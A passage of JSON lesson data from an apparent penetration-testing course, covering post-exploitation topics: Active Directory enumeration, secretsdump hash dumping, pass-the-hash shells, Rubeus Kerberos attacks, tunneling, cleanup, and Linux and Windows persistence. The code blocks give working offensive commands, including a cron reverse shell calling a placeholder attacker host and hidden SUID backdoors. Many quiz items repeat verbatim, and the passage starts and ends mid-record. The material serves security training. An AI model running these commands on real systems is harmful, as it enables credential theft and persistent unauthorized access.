conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"px-ad-enum","cat":"Post-Exploitation","title":"Active Directory Enumeration","diff":1,"xp":100,"intro":"Map the domain after getting a foothold.","sections":[{"type":"text","content":"Enumerate: users, groups, computers, policies, trusts, GPOs, ACLs \u2014 understand the domain before attacking it."},{"type":"code","lang":"bash","content":"# PowerView\nGet-DomainUser | Select samaccountname,description\nGet-DomainGroup -AdminCount\nGet-DomainComputer\nGet-DomainTrust\n# From Linux\ncrackmapexec smb DC -u user -p pass --users"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"First thing to enumerate in AD?","opts":["Firewall rules","Users, groups, and domain structure","Encryption keys","File shares only"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-secretsdump","cat":"Post-Exploitation","title":"Secretsdump: Dump All Domain Hashes","diff":3,"xp":200,"intro":"Extract every password hash in the domain.","sections":[{"type":"text","content":"Impacket's secretsdump performs DCSync or extracts from NTDS.dit, dumping every domain account's NTLM hash."},{"type":"code","lang":"bash","content":"# DCSync (needs replication rights)\nimpacket-secretsdump domain/admin:pass@DC\n# From NTDS.dit backup\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n# Specific user\nimpacket-secretsdump domain/admin:pass@DC -just-dc-user krbtgt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"secretsdump DCSync requires...","opts":["Physical access","Replicating Directory Changes permission","Network access only","File access"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-impacket-tools","cat":"Post-Exploitation","title":"Impacket Toolkit Overview","diff":2,"xp":150,"intro":"The essential Python toolkit for Windows network pentesting.","sections":[{"type":"text","content":"Impacket provides: psexec (shell via SMB), wmiexec (shell via WMI), smbexec, secretsdump, GetUserSPNs (Kerberoast), GetNPUsers (AS-REP), ntlmrelayx, and more."},{"type":"code","lang":"bash","content":"impacket-psexec admin@target -hashes :HASH\nimpacket-wmiexec admin@target -hashes :HASH\nimpacket-smbexec admin@target -hashes :HASH\nimpacket-GetUserSPNs domain/user:pass -dc-ip DC -request"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Impacket's psexec creates a shell via...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-rubeus","cat":"Post-Exploitation","title":"Rubeus: Kerberos Swiss Army Knife","diff":3,"xp":200,"intro":"Rubeus handles all Kerberos attacks from Windows.","sections":[{"type":"text","content":"Kerberoast, AS-REP roast, ticket request/import/export, S4U delegation, overpass-the-hash \u2014 all in one tool."},{"type":"code","lang":"bash","content":"# Kerberoast\nRubeus.exe kerberoast /outfile:hashes.txt\n# AS-REP Roast\nRubeus.exe asreproast\n# Request TGT with hash\nRubeus.exe asktgt /user:admin /rc4:HASH /ptt\n# Monitor for TGTs (unconstrained delegation)\nRubeus.exe monitor /interval:5"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Rubeus is specifically designed for...","opts":["Web testing","Kerberos attack and manipulation","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-tunnel-options","cat":"Post-Exploitation","title":"Tunneling and Proxy Options","diff":2,"xp":150,"intro":"Compare tunneling tools: SSH, chisel, ligolo, socat, plink.","sections":[{"type":"text","content":"Different situations need different tools: SSH when available, chisel for HTTP-only, ligolo for speed, socat for port forwarding, plink on Windows."},{"type":"code","lang":"bash","content":"# Best for each scenario:\n# SSH available: ssh -D 1080 user@target\n# HTTP only: chisel client attacker:8080 R:socks\n# Speed + stability: ligolo-ng\n# Simple port forward: socat TCP-LISTEN:8080,fork TCP:internal:80\n# Windows + no tools: plink.exe -D 1080 user@target"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Which tool works best with only HTTP outbound?","opts":["SSH","Chisel (tunnels over HTTP/WebSocket)","Socat","Plink"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-cleanup","cat":"Post-Exploitation","title":"Post-Engagement Cleanup","diff":1,"xp":75,"intro":"Remove your artifacts and restore the environment.","sections":[{"type":"text","content":"After the engagement: remove tools, clear created accounts, restore modified configs, delete uploaded files, and document what was changed."},{"type":"code","lang":"bash","content":"# Checklist:\n# 1. Remove all uploaded tools/scripts\n# 2. Delete created user accounts\n# 3. Restore modified files (configs, registry)\n# 4. Remove persistence mechanisms\n# 5. Clear created scheduled tasks\n# 6. Document everything that was changed"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Post-engagement cleanup is important because...","opts":["It hides evidence","Leftover tools and accounts create real security risks","It's optional","It saves disk space"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-persistence-linux","cat":"Post-Exploitation","title":"Linux Persistence Methods","diff":2,"xp":150,"intro":"Maintain access across reboots on Linux.","sections":[{"type":"text","content":"Cron jobs, SSH keys, systemd services, bashrc modifications, SUID backdoors, and LD_PRELOAD trojans."},{"type":"code","lang":"bash","content":"# SSH key\necho 'ssh-rsa AAAA...' >> ~/.ssh/authorized_keys\n# Cron reverse shell\n(crontab -l; echo '* * * * * bash -i >& /dev/tcp/attacker/4444 0>&1') | crontab -\n# SUID bash\ncp /bin/bash /tmp/.hidden && chmod +s /tmp/.hidden"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SSH key persistence works because...","opts":["It's encrypted","Keys bypass password authentication permanently","It modifies the kernel","It changes DNS"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-persistence-windows","cat":"Post-Exploitation","title":"Windows Persistence Methods","diff":2,"xp":150,"intro":"Maintain access across reboots on Windows.","sections":[{"type":"text","content":"Registry Run keys, scheduled tasks, services, WMI subscriptions, startup folder, DLL hijacking."},{"type":"code","lang":"bash","content":"# Registry Run key\nreg add HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /v Update /d C:payload.exe\n# Scheduled task\nschtasks /create /tn Update /tr C:payload.exe /sc onlogon /ru SYSTEM\n# Service\nsc create svc binPath= C:payload.exe start= auto"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report 